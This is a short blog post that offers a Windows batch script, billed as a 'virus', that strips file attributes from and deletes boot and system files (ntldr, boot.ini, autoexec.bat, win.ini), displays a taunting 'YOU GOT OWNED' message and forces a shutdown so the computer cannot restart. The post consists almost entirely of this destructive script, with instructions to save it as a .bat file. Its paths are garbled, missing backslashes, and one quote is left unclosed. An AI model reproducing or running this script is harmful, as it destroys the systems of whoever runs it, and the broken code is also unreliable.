Saturday, 15 April 2017

Virus To Shut Down Computer And Never Reboot Again

  No comments


Hello coder, in this post i will show a another amazing virus making tricks by which you can shut down any computer and make it never reboot again.so below is the code

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat  
attrib -r -s -h c:boot.ini
del c:boot.ini 
attrib -r -s -h c:ntldr
del c:ntldr 
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini 
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "OWNED BY GANGS OF CODER c:Drive

Note : Save the above code as .bat extension. i.e gangsofcoder.bat.

No comments :

Post a Comment

Loading...